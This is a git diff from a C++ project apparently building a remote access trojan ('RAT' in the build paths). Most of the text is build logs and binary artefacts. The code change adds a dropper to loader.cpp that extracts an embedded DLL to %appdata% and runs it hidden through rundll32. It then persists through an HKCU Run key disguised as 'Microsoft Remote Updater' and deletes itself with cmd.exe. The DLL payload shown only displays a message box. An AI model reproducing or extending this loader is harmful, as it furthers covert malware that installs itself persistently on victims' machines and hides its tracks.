diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj index 2be397b..18ce4a4 100644 Binary files a/Debug/FunDLL.iobj and b/Debug/FunDLL.iobj differ diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb index e9521e9..2099e96 100644 Binary files a/Debug/FunDLL.ipdb and b/Debug/FunDLL.ipdb differ diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb index 5cc9330..5df122a 100644 Binary files a/Debug/FunDLL.pdb and b/Debug/FunDLL.pdb differ diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb index 3afe78f..c69c382 100644 Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb index 7442067..693e8ed 100644 Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log index a7d3ee7..5e221a8 100644 --- a/Dll/Debug/Dll.log +++ b/Dll/Debug/Dll.log @@ -1,5 +1,6 @@ C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior. + fundll.cpp Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp Generating code All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog index b1f5512..4682923 100644 Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog index cecb9a2..b4bb458 100644 Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb index c1fb6af..6039950 100644 Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj index 8574aaf..439f48f 100644 --- a/Dll/Dll.vcxproj +++ b/Dll/Dll.vcxproj @@ -31,7 +31,7 @@ DynamicLibrary true v141_xp - Unicode + MultiByte true diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp index 5882e98..2eab02b 100644 --- a/Dll/fundll.cpp +++ b/Dll/fundll.cpp @@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) { break; case DLL_PROCESS_DETACH: - + break; default: - + break; } + return 1; } extern "C" __declspec(dllexport) int FunEntry() { - return MessageBoxA(0, "Hello from C2", 0, 0); + char exe[MAX_PATH + 1]; + GetModuleFileNameA(0, exe, sizeof(exe)); + MessageBoxA(0, exe, "I am inside: ", 0); + return 0; } \ No newline at end of file diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk index b2ac90c..5de5b6b 100644 Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log index 198e2b0..d66fb90 100644 --- a/Injector/Debug/Injector.log +++ b/Injector/Debug/Injector.log @@ -1,2 +1,2 @@ - LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link + injector.cpp Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog index 4a6fd2d..4073d96 100644 Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb index a02dcd8..71e54e2 100644 Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb index bc03652..c2807b3 100644 Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log index edac3ef..d7e0545 100644 --- a/Loader/Debug/Loader.log +++ b/Loader/Debug/Loader.log @@ -1,2 +1,6 @@ C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. +cl : Command line warning D9025: overriding '/sdl-' with '/GS-' + loader.cpp + tools.cpp + Generating Code... Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog index 1aeeb1c..b536724 100644 Binary files a/Loader/Debug/Loader.tlog/link.command.1.tlog and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog index 62b1f8e..f03f114 100644 Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb index 8f184aa..02fe3bb 100644 Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj index 0e0d345..6c22cec 100644 --- a/Loader/Loader.vcxproj +++ b/Loader/Loader.vcxproj @@ -96,7 +96,7 @@ Windows true - kernel32.lib;user32.lib + kernel32.lib;user32.lib;advapi32.lib diff --git a/Loader/loader.cpp b/Loader/loader.cpp index 35af249..ea2b25e 100644 --- a/Loader/loader.cpp +++ b/Loader/loader.cpp @@ -4,7 +4,7 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) { PBYTE module_base = PBYTE(Tools::GetImageBase()); if (module_base != ERROR) { - // extract payload from section move to %appdata% with random name + // extract payload from section DWORD module_size = NULL; PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size); @@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) { if (new_file != INVALID_HANDLE_VALUE) { WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL); } + CloseHandle(new_file); + } + LocalFree(dll_memory); + + // runs the dll after extraction + WCHAR win_path[MAX_PATH]; + if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) { + if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) { + lstrcatW(win_path, appdata_path); + lstrcatW(win_path, L","); + lstrcatW(win_path, L"FunEntry"); + + STARTUPINFO startup_inf{ 0 }; + PROCESS_INFORMATION process_information{ 0 }; + startup_inf.cb = sizeof(startup_inf); + + BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information); + + if (b) { + HKEY reg_key; + LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key); + if (bb == ERROR_SUCCESS) { + RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path)); + RegCloseKey(reg_key); + } + //WaitForSingleObject(process_information.hProcess, INFINITE); + //CloseHandle(process_information.hProcess); + } + } + } + } + + // delete loader + WCHAR del_cmd[MAX_PATH]; + if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) { + if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) { + WCHAR app_name[MAX_PATH]; + GetModuleFileNameW(0, app_name, MAX_PATH); + lstrcatW(del_cmd, L"/c del \""); + lstrcatW(del_cmd, app_name); + lstrcatW(del_cmd, L"\""); + + STARTUPINFO sii{ 0 }; + PROCESS_INFORMATION pii{ 0 }; + sii.cb = sizeof(sii); + + CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii); + return 0; } } } \ No newline at end of file